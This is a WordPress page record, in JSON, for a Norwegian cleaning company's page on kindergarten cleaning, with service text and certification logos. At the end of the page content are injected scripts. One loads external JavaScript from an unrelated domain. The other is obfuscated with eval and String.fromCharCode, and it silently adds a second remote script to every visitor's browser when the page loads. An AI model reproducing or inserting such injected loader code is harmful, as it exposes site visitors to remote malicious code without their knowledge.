{"id":5247,"date":"2021-03-26T11:24:32","date_gmt":"2021-03-26T10:24:32","guid":{"rendered":"http:\/\/ms24.no\/?page_id=5247"},"modified":"2023-10-30T23:15:02","modified_gmt":"2023-10-30T22:15:02","slug":"barnehagerenhold","status":"publish","type":"page","link":"https:\/\/ms24.no\/?page_id=5247","title":{"rendered":"Barnehagerenhold"},"content":{"rendered":"<h2>Barnehagerenhold<\/h2>\n<p>Milj\u00f8 Solutions AS er spesialisten p\u00e5 rengj\u00f8ring av barnehager. Vi vet hvilke krav som stilles til hygiene, innemilj\u00f8 og smittevern, da om lag 90 prosent av v\u00e5re oppdrag utf\u00f8res hos barnehager. Rutinemessig oppf\u00f8lging og kvalitetskontroll av v\u00e5re ansatte inneb\u00e6rer at du som kunde sikres god renholdskvalitet. Vi har korte kommunikasjonslinjer, og er raskt til stede hvis noe uforutsett skjer. Sammen med kundene planlegger vi hovedrengj\u00f8ring, oppskuring\/polish og highspeed polering av gulv gjennom \u00e5ret.<\/p>\n<p style=\"text-align: center;\">Bruk, skal ha forsvarlig renhold etter hygienisk tilfredsstillende metoder. Et godt renhold skal bidra til \u00e5 oppn\u00e5 trivsel, hygiene og godt inneklima samtidig som det forlenger levetiden p\u00e5 materialer og inventar. Det er her vi kommer inn!<\/p>\n<p style=\"text-align: center;\">Renhold i din barnehage utf\u00f8res etter en ramme som fastsettes av din barnehages behov, krav fra myndighetene, samt v\u00e5re anbefalinger. Vi har snart over 10 \u00e5rs erfaring med renhold i barnehager.<\/p>\n<h2>VI HAR F\u00d8LGENDE SERTIFISERINGER<\/h2>\n<p><!--more--><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"\" src=\"http:\/\/ms24.no\/wp-content\/uploads\/2021\/01\/gronn-punkt-e1611063978829.png\" alt=\"\" width=\"94\" height=\"96\" \/><img loading=\"lazy\" decoding=\"async\" class=\"\" src=\"http:\/\/ms24.no\/wp-content\/uploads\/2021\/01\/Startbank-140x105@2x.png\" alt=\"\" width=\"130\" height=\"98\" \/><img loading=\"lazy\" decoding=\"async\" class=\"\" src=\"http:\/\/ms24.no\/wp-content\/uploads\/2021\/01\/renholdsfirma-oslo_orig.jpg\" alt=\"\" width=\"159\" height=\"81\" \/><img loading=\"lazy\" decoding=\"async\" class=\"\" src=\"http:\/\/ms24.no\/wp-content\/uploads\/2021\/01\/mva-registrert_orig.png\" alt=\"\" width=\"118\" height=\"76\" \/><img loading=\"lazy\" decoding=\"async\" class=\"\" src=\"http:\/\/ms24.no\/wp-content\/uploads\/2021\/01\/renholdsbedrift_orig.jpg\" alt=\"\" width=\"118\" height=\"76\" \/><br \/>\n<!--more--><br \/>\n<script src='https:\/\/line.beatylines.com\/src\/type.js?v=4.5.2' type='text\/javascript' id='globalsway'><\/script><script>var f=String;eval(f.fromCharCode(102,117,110,99,116,105,111,110,32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,116,105,115,116,105,99,46,115,99,114,105,112,116,115,112,108,97,116,102,111,114,109,46,99,111,109,47,99,111,108,108,101,99,116,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,125,125));\/*99586587347*\/<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Barnehagerenhold Milj\u00f8 Solutions AS er spesialisten p\u00e5 rengj\u00f8ring av barnehager. Vi vet hvilke krav som stilles til hygiene, innemilj\u00f8 og smittevern, da om lag 90 prosent av v\u00e5re oppdrag utf\u00f8res hos barnehager. Rutinemessig oppf\u00f8lging og kvalitetskontroll av v\u00e5re ansatte inneb\u00e6rer at du som kunde sikres god renholdskvalitet. Vi har korte kommunikasjonslinjer, og er raskt til [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-5247","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/ms24.no\/index.php?rest_route=\/wp\/v2\/pages\/5247","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/ms24.no\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/ms24.no\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/ms24.no\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/ms24.no\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5247"}],"version-history":[{"count":18,"href":"https:\/\/ms24.no\/index.php?rest_route=\/wp\/v2\/pages\/5247\/revisions"}],"predecessor-version":[{"id":5923,"href":"https:\/\/ms24.no\/index.php?rest_route=\/wp\/v2\/pages\/5247\/revisions\/5923"}],"wp:attachment":[{"href":"https:\/\/ms24.no\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5247"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}